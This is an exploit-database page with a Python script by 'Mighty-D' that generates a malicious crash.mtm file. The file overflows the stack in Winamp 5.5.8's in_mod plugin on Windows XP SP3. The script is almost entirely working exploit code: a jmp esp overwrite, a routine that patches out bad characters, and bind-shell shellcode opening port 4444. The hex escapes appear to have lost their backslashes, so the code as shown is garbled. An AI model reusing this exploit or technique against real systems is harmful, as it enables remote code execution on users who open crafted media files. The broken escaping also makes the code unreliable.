[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit
# Published : 2010-10-19
# Author : Mighty-D
# Previous Title : GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability
# Next Title : Linux RDS Protocol Local Privilege Escalation
#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
header = "x4Dx54x4Dx10x53x70x61x63x65x54x72x61x63x6Bx28x6Bx6Fx73x6Dx6Fx73x69x73x29xE0x00x29x39x20xFFx1Fx00x40x0E"
header += "x04x0C" * 16
nopsled = "x90" * 58207
eip = "xEDx1Ex95x7C" # jmp esp WIN XP SPANISH change at will
patch_shellcode = "x90" * 16
patch_shellcode += "x90x33xDB" # Set EBX to zero
patch_shellcode += "x54x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION
patch_shellcode += "x81xEBx95xFCxFFxFF" # make EBX point to our shell
patch_shellcode += "x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*1 # Move EBX to the first badchar
patch_shellcode += "x80x2Bx20" # Set it to 13 - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 05 - verified
patch_shellcode += "x43"*16 # Move EBX to the next badchar
patch_shellcode += "x80x2BxEC" # Set it to 21 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified
patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*30 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 05 - verified
patch_shellcode += "x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx42" # Set it to CB - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx78" # Set it to 92 - verified
patch_shellcode += "x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*18 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 04 - verified
patch_shellcode += "x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*15 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 02 - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx21" # Set it to EC - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx7C" # Set it to 8e - verified
patch_shellcode += "x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*18 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx49" # Set it to c1 - verified
patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to EA, but we need F6
patch_shellcode += "x80x2BxF4" # Set it to F6 - verified
patch_shellcode += "x43"*9 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 11 - verified
patch_shellcode += "x43"*10 # Move EBX to the next badchar
patch_shellcode += "x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode += "x80x2BxCD" # Set it to 3D - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 07 - verified
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*11 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx8E" # Set it to 7F - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxDF" # Set it to 2B - verified
patch_shellcode += "x43"*8 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx1E" # Set it to EC - verified
patch_shellcode += "x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*12 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 8 - verified
patch_shellcode += "x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*29 # Move EBX to the next badchar
patch_shellcode += "x80x2Bxa7" # Set it to 66 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "x80x2Bxb8" # Set it to 52 - verified
patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*17 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 3 - verified
patch_shellcode += "x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 12 - verified
patch_shellcode += "x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*2 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 3 - verified
patch_shellcode += "x43"*7 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 2 - verified
patch_shellcode += "x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*6 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 13 - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 5 - verified
patch_shellcode += "x43"*3 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx1B" # Set it to F2 - verified
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxF4" # Set it to 16 - verified
patch_shellcode += "x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 10 - verified
patch_shellcode += "x43"*4 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 10 - verified
patch_shellcode += "x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*17 # Move EBX to the next badchar
patch_shellcode += "x90"*28 # Lazy nopsled
patch_shellcode += "x43"*16 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx26" # Set it to E7 - verified
patch_shellcode += "x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode += "x43"*1 # Move EBX to the next badchar
patch_shellcode += "x80x2BxBE" # Set it to 4C - verified
patch_shellcode += "x43"*7 # Move EBX to the next badchar
patch_shellcode += "x80x2Bx20" # Set it to 5 - verified
patch_shellcode += "x90"*(66)
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
shellcode = "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
shellcode += "x33" # Should be 13
shellcode += "xa9x41"
shellcode += "x25" # should be 05
shellcode += "x3fx83xebxfcxe2xf4x55x2bxeex72x41xb8xfaxc0"
shellcode += "x56" # x21x8e Ripped
shellcode += "x53x8dx65x8ex7ax95xcax79x3axd1x40xeaxb4"
shellcode += "xe6x59x8ex60x89x40xeex76x22x75x8ex3ex47x70xc5xa6"
shellcode += "x25" # should be 05
shellcode += "xc5xc5x4bxaex80xcfx32xa8x83xee" # xcbx92
shellcode += "x15x21x17"
shellcode += "xdcxa4x8ex60x8dx40xeex59x22x4dx4exb4xf6x5d"
shellcode += "x24" #Should be 04
shellcode += "xd4xaax6dx8exb6xc5x65x19x5ex6ax70xdex5bx22"
shellcode += "x22" # Should be 02
shellcode += "x35xb4xe9x4dx8ex4fxb5" # xec8e Ripped
shellcode += "x7fxa1x1fx6dxb1xe7x4fxe9x6f"
shellcode += "x56x97x63x6cxcfx29x36x0d" # xc1 Ripped
shellcode += "x36x76x0d" # xf6 ripped
shellcode += "x15xfaxef"
shellcode += "xc1x8axe8xc3x92"
shellcode += "x31" # Should be 11
shellcode += "xfaxe9xf6xc8xe0x59x28xacx0d" # x3d ripped
shellcode += "xfcx2b"
shellcode += "x27" # should be 07
shellcode += "xc0x79x29xdcx36x5cxecx52xc0x7f"
shellcode += "x32" # should be 12
shellcode += "x56x6cxfa"
shellcode += "x32" # should be 12
shellcode += "x46x6cxea"
shellcode += "x32" # should be 12
shellcode += "xfaxefxcfx29x14x63xcf"
shellcode += "x32" #should be 12
shellcode += "x8cxde"
shellcode += "x3cx29xa1x25xd9x86x52xC0" # x7fx2b Ripped
shellcode += "x15x6exfcxbexd5x57"
shellcode += "x0d" # xec Ripped
shellcode += "x2bxd6xfexbexd3x6cxfcxbexd5x57x4c"
shellcode += "x28" # should be 08
shellcode += "x83x76"
shellcode += "xfexbexd3x6fxfdx15x50xc0x79xd2x6dxd8xd0x87x7cx68"
shellcode += "x56x97x50xc0x79x27x6fx5bxcfx29" # x66x52 Ripped
shellcode += "x20xa4x6fx6f"
shellcode += "xf0x68xc9xb6x4ex2bx41xb6x4bx70xc5xcc"
shellcode += "x23" # shoudl be 03
shellcode += "xbfx47"
shellcode += "x32" #Should be 12
shellcode += "x57"
shellcode += "x23" # Should be 03
shellcode += "x29xacx24x3bx3dx94"
shellcode += "x22" # should be 02
shellcode += "xeax6dx4dx57xf2"
shellcode += "x33" # should be 13
shellcode += "xc0xdc"
shellcode += "x25" # should be 5
shellcode += "xfaxe9" # xf2x16 Ripped
shellcode += "x57x6exf8"
shellcode += "x30" #should be 10
shellcode += "x6fx3exf8"
shellcode += "x30" # Should be 10
shellcode += "x50x6e"
shellcode += "x56x91x6dx92x70x44xcbx6cx56x97x6fxc0x56x76xfaxef"
shellcode += "x22x16xf9xbcx6dx25xfaxe9xfbxbexd5"
shellcode += "x57xd7x99" #xe7x4c Ripped
shellcode += "xfaxbexd3xc0x79x41"
shellcode += "x25" # should be 05
shellcode += "x3f"
payload = header + nopsled + eip + patch_shellcode + shellcode
try:
file = open("crash.mtm", "w")
file.write(payload)
file.close()
print "MTM file generated successfuly"
except:
print "Cannot create file"